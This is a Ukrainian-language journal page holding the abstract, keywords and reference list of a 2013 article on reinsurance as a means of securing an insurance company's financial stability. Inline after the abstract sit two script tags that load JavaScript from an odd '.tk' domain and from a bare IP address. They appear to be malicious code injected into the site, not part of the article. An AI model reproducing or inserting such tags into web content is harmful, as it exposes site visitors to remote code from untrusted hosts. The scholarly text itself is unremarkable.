ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 368.2
Сторінка молодого науковця

Перестрахування як механізм забезпечення фінансової стійкості страхової компанії / Шулєшова І. В. // Економіка АПК. - 2013. - № 2 - С. 124

Досліджено вплив механізму перестрахування на фінансову стійкість страхової компанії. Встановлено, що за допомогою операцій перестрахування страхова компанія може впливати на рівень своєї платоспроможності. На сучасному етапі розвитку страхового ринку перестрахування має ряд проблем і недоліків. Досягнення достатнього рівня фінансової стійкості компанії можливо лише при виконанні всього спектра перестраховнх операцій, що потребує вдосконалення правової бази та нормативних актів для проведення перестрахування. Табл.: 1. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: перестрахування, фінансова стійкість страхової компанії, функції перестрахування

Список використаних джерел

 1. Бойко А.О. Оптимізація портфеля страхових компаній на основі застосування операцій перестрахування / А.О.Бойко // Гроші, фінанси та кредит. Актуальні проблеми економіки. - 2011 . - №1. - С. 160-170.
 2. Бойко А.О. Формалізації впливу перестрахування на рівень платоспроможності страхової компанії / А.О. Бойко // Інноваційна економіка. - 2011. - № 20. - С. 226-230.
 3. Козьменко О.В. Сучасний стан і перспективи розвитку ринку перестрахування в Україні / О.В. Козьменко, А.О. Бойко // Фінанси України. - 2011. - № 6. - С. 24-33.
 4. Лебединська Л.Д. Фактори забезпечення фінансової стійкості страхових компаній в глобальному середовищі / Л.Д. Лебединська, М. Ремнева // Фінанси. Банківська справа. - 2011. - № 1(1). - С. 113-120.
 5. Лопата О.О. Іноземне перестрахування як елемент забезпечення фінансової стійкості національного страхового ринку / О.О. Лопата, І.О. Лещинін // Науковий вісник НЛТУ України. - 2011. - № 21.9 - С. 225-230.
 6. Національна комісія, що здійснює державне регулювання у сфері ринків фінансових послуг [Електронний ресурс]. - Режим доступу: http://www.dfp.gov.ua/1060.html.
 7. Нечипорук Л.В. Особливості перестрахування в умовах глобалізації / Л.В. Нечипорук // Вісник національної юридичної академії ім. Ярослава Мудрого. - 2011. - № 2(5). - С. 49-56.
 8. Проблемы перестрахования в Украине [Електронний ресурс]. - TRISTAR - твой финансовый навигатор. 2012. - Режим доступу: http://tristar.com.Ua/1/art/problemy_perestrahovaniia_v_ukraine_13013.html.
 9. Теребус ОМ. Перестрахування та проблеми його розвитку в Україні / О.М. Теребус // Галицький економічний вісник. - 2009. - № 2. С. 105-109.
 10. Формування страхового ринку України в контексті сталого розвитку: науково-дослідна робота за темою: Науково-методичні засади розвитку ринку перестрахування в Україні / С.В. Леонов, Ю.С. Конопліна, В.Л. Пластун, О.С. Журавка, А.О. Бойко, А.Ю. Семеног; наук. керівник С.М. Козьменко // Державний вищий навчальний заклад "Українська академія банківської справи Національного банку України". Суми, 2011. - 184 с.
 11. Что такое перестрахование? [Електронний ресурс]. - Перестрахование. - Режим доступу: http://re-insurance.com.ua.
Читати статтю: 13_02_23.pdf